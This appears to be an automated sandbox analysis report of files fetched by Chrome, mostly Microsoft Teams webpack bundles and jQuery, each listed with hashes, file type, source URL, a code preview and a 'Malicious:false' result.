                                                                                                                                                                                                                                                                            SHA1:0DD58AA9FEBAACE29839418E4D5D8C12FBE253DB
                                                                                                                                                                                                                                                                            SHA-256:52C61243F0C75D908D691EEF58E6DFB3FA49D6A19F02040C20DB452D98E3676D
                                                                                                                                                                                                                                                                            SHA-512:FC6584D069EA5D4D412F2E5C95BA72D51D669F5CF99E6EB9AC74CC2E0A2EAA0F95CDBC9C704E8A5548D421B1702B51BDE3938950046701CA6E8D387004EFB186
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/libphonenumber-bundle-d6c9245b72d57bc2.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725236],{744465:(module,__unused_webpack_exports,__webpack_require__)=>{var f;f=function(){var define,module,exports;return function e(o,t,r){function n(i,a){if(!t[i]){if(!o[i]){if(d)return d(i,!0);var g=new Error("Cannot find module '"+i+"'");throw g.code="MODULE_NOT_FOUND",g}var s=t[i]={exports:{}};o[i][0].call(s.exports,(function(e){return n(o[i][1][e]||e)}),s,s.exports,e,o,t,r)}return t[i].exports}for(var d=void 0,i=0;i<r.length;i++)n(r[i]);return n}({1:[function(require,module,exports){(function(global){(function(){var $jscomp=$jscomp||{};$jscomp.scope={},$jscomp.createTemplateTagFirstArg=function(e){return e.raw=e},$jscomp.createTemplateTagFirstArgWithRaw=function(e,o){return e.raw=o,e},$jscomp.arrayIteratorImpl=function(e){var o=0;return function(){return o<e.length?{done:!1,value:e[o++]}:{done:!0}}},$jscomp.arrayIterator=function(e){return{next:$jscomp.arrayIteratorImpl(e)}},$jsco
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31824)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):31932
                                                                                                                                                                                                                                                                            Entropy (8bit):5.402534530907136
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:YAFc8qHGsxF3tPtO8ZD6C8pdM3TFDBb8TcGa31tYb+t0CHkff3BZCNP3HV6gWX5S:Zw3prFtaTRCgCNP3HV6U
                                                                                                                                                                                                                                                                            MD5:797315EF7EA16ABA689C9633F59ED25A
                                                                                                                                                                                                                                                                            SHA1:CD4F1F27DE7D1DFA86F13FD03D04260FED73D963
                                                                                                                                                                                                                                                                            SHA-256:BD244032A51946A48E662BE13A03BDF0413AD98D6CC7F897EE912F66EA12C4FE
                                                                                                                                                                                                                                                                            SHA-512:6A7C5C39F89D9BA4F6BEFF77AD187A979ABE30262AD21CB0AF2012F4ED2222443598A998A59688CAE93A66E75420C425E74720A86C1F589C4F8D7FF8AEAA36C8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[526413,631106],{609949:(e,t,l)=>{l.d(t,{L1:()=>m});var a,o=l(277362),i=l(305536);!function(e){e[e.PngAndHtmlCopied=0]="PngAndHtmlCopied",e[e.HtmlCopied=1]="HtmlCopied"}(a||(a={}));const n=new Map;async function r(e,t,l){const o=e.document,r=new Promise((async(l,a)=>{try{let o=await t;const i=new URL(o.src);if(!(e.location.origin===i.origin||"data:"===i.protocol))try{o=await c(e,o.src)}catch(e){a(new Error(`copyImageElementToClipboard: error on same-origin image load "${e.message}"`))}o.complete?l(o):s(o,(()=>{l(o)}),(e=>{a(new Error(`copyImageElementToClipboard: error on image load "${e.message}"`))}))}catch(e){a(e)}})),d=new Promise((async(e,t)=>{try{const l=await r,a=o.createElement("canvas");a.width=l.naturalWidth,a.height=l.naturalHeight;const i=a.getContext("2d");i?(i.drawImage(l,0,0),e(a)):t(new Error("copyImageElementToClipboard: failed to get canvas 2d context."))}cat
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):184177
                                                                                                                                                                                                                                                                            Entropy (8bit):5.3191226575984345
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:fi7gpBpWtqHhwhsfe5eIctg2VlI8BI9WxvzuVreYukk:ugpBpWtqHWsfe5R8yyI9WZuBeYukk
                                                                                                                                                                                                                                                                            MD5:9322E60C4BE9C4A28ADF2987CAAFCA4C
                                                                                                                                                                                                                                                                            SHA1:326505C91BBB0CCC40D1DA0EC6B35D2D17C96139
                                                                                                                                                                                                                                                                            SHA-256:C72402BAC3EEB2E2549F07DA6DF25DF9FB6A09068064942EB73EE8A6FA034F5E
                                                                                                                                                                                                                                                                            SHA-512:50F2722E622DD2C8BBDA26895FEE0C71EB634781E714AFBAD672CD2F3C797BF7F455471E51EDDEBDCB2A9B57335B86B33F4AA7CFD811344201D8962952D7CBD1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/supermassive-incremental-link-4eeacb7f645bb984.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[463638],{926380:(e,t,n)=>{"use strict";n.d(t,{O:()=>r});var a=n(492225);function r(e,t){for(const n of t)Array.isArray(n)?r(e,n):i(e,n);return e}function i(e,t){for(const[n,r]of Object.entries(t)){const t=e[n];void 0===t&&r?e[n]=r:(0,a.Z)(t)&&(0,a.Z)(r)&&Object.assign(e[n],r)}}},953084:(e,t,n)=>{"use strict";n.d(t,{m1:()=>i});var a=n(710773),r=n(691143);function i(e,t){var n;if(!t.length)return e;for(const a of t)e.types?a.types&&s(e.types,a.types):e.types=a.types,e.directives?(null==(n=a.directives)?void 0:n.length)&&o(e.directives,a.directives):e.directives=a.directives;return e}function o(e,t){for(const n of t){const t=e.find((e=>(0,a.d$)(e)===(0,a.d$)(n)));if(!t){e.push(n);continue}const r=(0,a.Gc)(n);if(!r)continue;const i=(0,a.Gc)(t);i?d(i,r):(0,a.iS)(t,r)}}function s(e,t){for(const[n,i]of Object.entries(t)){const t=e[n];if(t){if((0,a.rW)(t)&&(0,a.rW)(i)||(0,a.du)(t)&&(0,a.du)(i))c(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (59967)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):60075
                                                                                                                                                                                                                                                                            Entropy (8bit):5.518703276003212
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:XBE4rKleGEo9R+ueSRMcGcDpPRg5Nq07f+gUSeUzOVfC6Sqa9rPWpNsv0H7+N28l:XjC9RGcDgGOqZy
                                                                                                                                                                                                                                                                            MD5:F1A6F6A17533339038ED2014DE129AF2
                                                                                                                                                                                                                                                                            SHA1:A3F9661331744D6204B840138D43666B6F16D4F4
                                                                                                                                                                                                                                                                            SHA-256:1F0845F24545A58DF4081FCF0EA1D4E144C00098A783005561D8FF0169855776
                                                                                                                                                                                                                                                                            SHA-512:61F70D9D595D91B92AD561CAD3B08AC34B9183A8164318AA59C46BADAFF7EA4C8B1D5E44121F16F68D262BEA36FB3A12C5B5723423DC84FDC357A84E35EE570F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[266580],{206008:(e,t,n)=>{n.d(t,{I:()=>o});const o=(0,n(965804).O)({dialogContentStyle:{mc9l5x:"f22iagw",Beiy3e4:"f1vx9l62",a9b677:"fdhnlf0"},dialogBodyLoadingStyle:{z8tnut:"f154whs3",Byoj8tv:"fwscnda",mc9l5x:"f22iagw",Beiy3e4:"f1vx9l62",Bt984gj:"f122n59",a9b677:"fly5x3f",jrapky:0,Frg6f3:0,t21cq0:0,B6of3ja:0,B74szlk:"fcpdi13"},dialogTitleStyle:{Bqenvij:"fvi13kb",Bhrd7zp:"f1leeax8",Be2twd7:"f1rt2boy",Bahqtrf:"fztbzda",Bg96gwp:"f49wi19",fsow6f:"f17mccla",a9b677:"fdhnlf0",B6of3ja:"f1rqyxcv"},dialogSubtext:{Brf1p80:"f4d9j23",Bhrd7zp:"f71fsbu"},forceEntraDialogSubtext:{Brf1p80:"f4d9j23",Bhrd7zp:"f71fsbu",fsow6f:"f17mccla",sj55zd:"fe3e8s9"},dialogProgressBarStyle:{a9b677:"fr584hq"},dialogActionButtonStyle:{mc9l5x:"f22iagw",z8tnut:"fc7z3ec",Byoj8tv:"fdghr9",uwmqm3:["fjlbh76","f11qrl6u"],z189sj:["f11qrl6u","fjlbh76"],Brf1p80:"f4d9j23",Bt984gj:"f122n59",Bf4jedk:"fn6pdc",Bqenvij:"favxu
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (10182)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):10290
                                                                                                                                                                                                                                                                            Entropy (8bit):4.425385956221975
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:qt5HUtKw504Rm5KDkCNDxSyBbsswz0yGo7diOj1cShp:wxEJ0gmdCjSyBbsswz0Xedlp
                                                                                                                                                                                                                                                                            MD5:E21950488A8D58585B1C5DD898AF5096
                                                                                                                                                                                                                                                                            SHA1:CA6B4151F4ABC2327A82CCC457288B9B49060FE2
                                                                                                                                                                                                                                                                            SHA-256:95094BC43EEF7AC9BA858C4F44F5D6A0D068F1957739B83A1C7C7F0E1E7A4D41
                                                                                                                                                                                                                                                                            SHA-512:E3BD27D664BECE838E10C868F34B5D9EAAC656E28E76BFE1B43A66B175411A7ADBCBBDEAA071F5E0C80416EEC57B9E2E3B73B9C40772039E95F8787AB0DDE5EF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/867529-deea7e323c540d0d.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[867529],{867529:(a,l,Z)=>{Z.d(l,{VOc:()=>m,F$A:()=>c,xwX:()=>e,l3w:()=>M,uE4:()=>t,CSm:()=>L,a4W:()=>i,OUC:()=>s,nVo:()=>u,b4K:()=>H,PLv:()=>r,ZDw:()=>U,mRs:()=>T,gaL:()=>A,K2C:()=>g,zqF:()=>v,SqZ:()=>R,FKn:()=>V,if_:()=>F,i5S:()=>d,uhv:()=>k,MyB:()=>n,dDm:()=>x,vR$:()=>C});var h=Z(693935);const m=(0,h.U)("Tag20Filled","20",["M18 4.03a2 2 0 0 0-1.98-2L11.12 2a2 2 0 0 0-1.42.59L3.02 9.25a2 2 0 0 0 0 2.83l4.95 4.95a2 2 0 0 0 2.83 0l6.63-6.63A2 2 0 0 0 18 8.98V4.03ZM14 7a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"]),c=(0,h.U)("Tag20Regular","20",["M14 7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm-2.87-5a2 2 0 0 0-1.43.58L3.02 9.25a2 2 0 0 0 0 2.83l4.95 4.95a2 2 0 0 0 2.83 0l6.63-6.63A2 2 0 0 0 18 8.98V4.03a2 2 0 0 0-1.99-2L11.12 2Zm-.72 1.3a1 1 0 0 1 .71-.3l4.9.03a1 1 0 0 1 .99 1v4.95a1 1 0 0 1-.29.7l-6.63 6.64a1 1 0 0 1-1.41 0l-4.95-4.95a1 1 0 0 1 0-1.41l6.68-6.67Z"]),e=(0,h.U)("TagMultiple20Filled","20",
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):110000
                                                                                                                                                                                                                                                                            Entropy (8bit):5.022656432488014
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:d6Pum+zZuT9O0I5m6w6HFKDsElAimnjHiv01CRiL9+8VQ6Kme:d6Pu1ZyO1m6w6ULOHiv01CRilvKme
                                                                                                                                                                                                                                                                            MD5:9A7BE607ED7D8CE7A198753E8CC2D594
                                                                                                                                                                                                                                                                            SHA1:39B77DB9B6D17FC9520B2279ED3554927A3C21B9
                                                                                                                                                                                                                                                                            SHA-256:61A61E42CEDB2B00B880446916047CF54B4661EA1ABAE08C2A89B4F51827A5DB
                                                                                                                                                                                                                                                                            SHA-512:0CB46587E891E3371ADF6269F6F1B09EB1E7E22426FFD7BD6088C4CB07F0BF70B2B91D7263B8651D6893E2CCB51B2A320350458A6D318F523F28F55E8CF6C6FA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[364713],{450787:(t,e,a)=>{"use strict";a.d(e,{I:()=>i});var s=a(554186);class i{constructor(){this._id=(0,s.v4)(),this._dispose=null,this._data={}}get id(){return this._id}get data(){return this._data}set proximitySource(t){this._data["MeetingRoom.proximitySource"]=t}set alertName(t){this._data["DataBag.alertName"]=t}set allAliasesTurnedOff(t){this._data["DataBag.allAliasesTurnedOff"]=t}set allAliasesWithPrivateVisibility(t){this._data["DataBag.allAliasesWithPrivateVisibility"]=t}set tabAppCount(t){this._data["DataBag.tabAppCount"]=t}set appId(t){this._data["DataBag.appId"]=t}set appInstallScope(t){this._data["DataBag.appInstallScope"]=t}set appStoreOriginSource(t){this._data["DataBag.appStoreOriginSource"]=t}set isUserPartOfMeetingAttendeesCount(t){this._data["DataBag.activeCallsCount"]=t}set setIsMeetingGame(t){this._data["DataBag.isMeetingGame"]=t}set autoreconnectShown(t){this._data["
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21486)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):21594
                                                                                                                                                                                                                                                                            Entropy (8bit):5.170715153687207
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:k24mpfRVWom31rMIzQ15YmNy9140jxAnSjatS5o4FjatvRYfhEB5jP6S1I+:k24mpJVWom31rMIzQ1SmNy91401AZRYM
                                                                                                                                                                                                                                                                            MD5:FF8030A187A57F36F9E03916F84C47E2
                                                                                                                                                                                                                                                                            SHA1:634558A0AD110BB6B76225F8F3A05ADD6A828B58
                                                                                                                                                                                                                                                                            SHA-256:4CE38EFA5FC9ABAC0FB8367AFD9E10C4A96035E347D966DF62D1FF8016FB82AC
                                                                                                                                                                                                                                                                            SHA-512:DDF81CB52E920221C553977DBFE9BB51E599371E4F6E297E8B0C840FAA5768D377B1F5F6A06C902F63193F0C0835BDA4EE96C10714CDD77599C0324790BD21F4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/872355-49ee321fd83c8ee9.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[872355],{128943:(e,t,i)=>{i.d(t,{K:()=>l});var r=i(332752),s=i(34655),n=i(805809),o=i(355515);const a={transitiveMembersCount:"beta/users/{dlId}/GroupTransitiveMembersCount",transitiveMembers:"beta/users/{dlId}/GroupTransitiveMembers"};class l{constructor(e,t,i){this.mtSend=t,this.logger=e.newLogger("Distribution List Service","services-io-distribution-list");const{isDistributionListServiceEnabled:s}=i.get(r.w.DistributionLists);this.isServiceEnabled=s||!1}async getTransitiveMembersCountForDistributionList(e){if(!this.isServiceEnabled)return Promise.reject(this.createErrorForDisabledService("getTransitiveMembersCountForDistributionList"));const t=a.transitiveMembersCount.replace("{dlId}",e);try{const e=await this.mtGet(t,"getTransitiveMembersCountForDistributionList").then((({body:e})=>e.json()));return Promise.resolve(e)}catch(e){return this.logger.error("getTransitiveMember
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):303412
                                                                                                                                                                                                                                                                            Entropy (8bit):5.40370027576381
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:KD2jvRESO35Ffqbc2m55TFqeScmuoqhIYZMz5R3L77:KD2jvRESO35Ffqbc2k5TFGcmu7hIYZCj
                                                                                                                                                                                                                                                                            MD5:4E0F902A44033710EEA69C0C9B3BEEE0
                                                                                                                                                                                                                                                                            SHA1:DF1A4F76A5C3B80FC9F6D3311A2C0BB15691F782
                                                                                                                                                                                                                                                                            SHA-256:B17A8D3BDB6CDFFB6540C74CC24052297F660032AC37DAB890A275EB2DB37519
                                                                                                                                                                                                                                                                            SHA-512:C25E4564633EDF20082CBD3A79B3695989424B37756F1F5386C29FF792F93790B763C5979A0FB4ED4E532B285126D53B68D1D8C5FB7C3E85019FB6CF4913D8C4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/230194-3ee389bad57950c5.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[230194],{453766:(e,r,o)=>{o.d(r,{J:()=>n});var a=o(888846),t=o(698099),n=function(){return{attributes:{root:{role:"toolbar"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:t.i}}}},698099:(e,r,o)=>{o.d(r,{i:()=>n});var a=o(953543),t=o(504405),n=function(e){var r;return{attributes:{wrapper:{role:"presentation"},root:(r={role:"button",tabIndex:0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-disabled":e.disabled,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"]},r[t.P]=!0,r)},keyActions:{wrapper:{performClick:{keyCombinations:[{keyCode:a.rC.Enter},{keyCode:a.ZG}]},closeMenuAndFocusTrigger:{keyCombinations:[{keyCode:a.rC.Escape}]},openMenu:!e.vertical&&{keyCombinations:[{keyCode:a.rC.ArrowDown}]},doNotNavigateNextParentItem:{keyCombinations:e.hasMen
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21912)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):22019
                                                                                                                                                                                                                                                                            Entropy (8bit):5.493884334447431
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:+GBvGvFiE5p3r+T4JeoktvPIYKLioLLJWfvAoR1CbQw2+fEwCiFLKzR3LzSmWvKV:+GBvGvFiE5pb+T4JeoktvPIYKLioLLJy
                                                                                                                                                                                                                                                                            MD5:3B64EA431903F44AD5097AB64EB191AF
                                                                                                                                                                                                                                                                            SHA1:7D6D71D58B698E2C4113D89AE4EC421C68D0774F
                                                                                                                                                                                                                                                                            SHA-256:38EA39B025AB3CE7D81F4E3E9D1F5186D9ECD2E2F88C6CD6695F00368FE204CA
                                                                                                                                                                                                                                                                            SHA-512:6F88011B4916F9C69253C722AD0C1CAAC7C5AFE8506A4619C5DED2DCDE08E78BE8B09C68A06D95D2F6B8C2DF55129551E7107117D0A70F98378425DE693BE0B9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/67835-5e151cb9b75fd477.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[67835],{117695:(e,n,t)=>{var i,s;t.d(n,{I:()=>i,V:()=>s}),function(e){e.Compose="Compose",e.MessagePane="MessagePane",e.DeeplinkedMessage="DeeplinkedMessage",e.DoNotMove="DoNotMove",e.PeoplePickerInput="people-picker-input"}(i||(i={})),function(e){e.LeftRailSelectedItem="LeftRailSelectedItem",e.DoNotMove="DoNotMove"}(s||(s={}))},199631:(e,n,t)=>{var i;t.d(n,{m:()=>i}),function(e){e.APP_SWITCHER_CONFIRMATION_RENDERED="app-switcher-confirmation-renderer",e.AUDIO_DEVICE_SETTINGS_RENDERED="audio-device-settings-rendered",e.CALENDAR_HEADER_RENDERED="calendar-header-rendered",e.CALENDAR_VIEW_RENDERED="calendar-view-rendered",e.CALENDAR_SF_HEADER_RENDERED="calendar-sf-header-rendered",e.CALENDAR_SF_VIEW_RENDERED="calendar-sf-view-rendered",e.CALENDAR_SF_TRACKING_VIEW_RENDERED="calendar-sf-tracking-view-rendered",e.CALL_FORWARDING_SETTINGS_RENDERED="call-forwarding-settings-rendered"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (23673)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):23780
                                                                                                                                                                                                                                                                            Entropy (8bit):5.286961123123951
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:d8gaa9LSV5yrS0SWSCSYSLSy6/OU/poVLvtmK6bzrCzfLxpBsxp107IZtX:WgaAuV5fJljWy+poVL1mK6bzWzf+107W
                                                                                                                                                                                                                                                                            MD5:8A4AC929051220C24FB5440F9916FEF2
                                                                                                                                                                                                                                                                            SHA1:52C6A6A2FDDCFB2794638ACA38391BDEF6F16EC0
                                                                                                                                                                                                                                                                            SHA-256:93D967482971DBCF399FD11DCE12FA4BF037DF1608C5696DA852AF8C8C7AB521
                                                                                                                                                                                                                                                                            SHA-512:2FF97ACC1CFF1964901F3BDA62D2AD95E8CE202BED098CA30196EE1EF75547CB9672FF505A4047F1F2CED18C90AE47191F560FC46F53824A24B98F27CE7BE43F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[34655],{34655:(e,t,r)=>{r.d(t,{TL:()=>a,XY:()=>n,f2:()=>s,O4:()=>d,LD:()=>l,sj:()=>c,Ir:()=>C,lQ:()=>T,J2:()=>u,dy:()=>E,c1:()=>S,Kw:()=>I,N2:()=>m,Vx:()=>p,Xn:()=>A,Xk:()=>v,qj:()=>R,ak:()=>D,mA:()=>g,JN:()=>k,ow:()=>L,Tl:()=>F,XK:()=>U,Mh:()=>P});var a,i,n,o=r(724801);!function(e){e[e.Presenting=0]="Presenting",e[e.InCall=1]="InCall",e[e.InBroadcast=2]="InBroadcast",e[e.Interactive=3]="Interactive",e[e.Inactive=4]="Inactive",e[e.LongInactive=5]="LongInactive",e[e.Disabled=6]="Disabled",e[e.Disconnected=7]="Disconnected",e[e.Offline=8]="Offline",e[e.Uninitialized=9]="Uninitialized"}(a||(a={})),function(e){e.AppLogout="appLogout"}(i||(i={})),function(e){e[e.error=0]="error",e[e.warn=1]="warn",e[e.info=2]="info",e[e.verbose=3]="verbose"}(n||(n={}));const s={second:1e3,minute:6e4,tenMinutes:6e5};var d,l,c,C;!function(e){e.Deserialization="Deserialization",e.Unknown="Unknown",e.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):190440
                                                                                                                                                                                                                                                                            Entropy (8bit):4.954996696566872
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:csEkDwI5NFTL45cwYLfrbj52Dd0l2jQkNT5gpdLb96XXeEHtfwUzkSO1+KipnH+e:csGNIw+kX11ENcnqY2KvHz
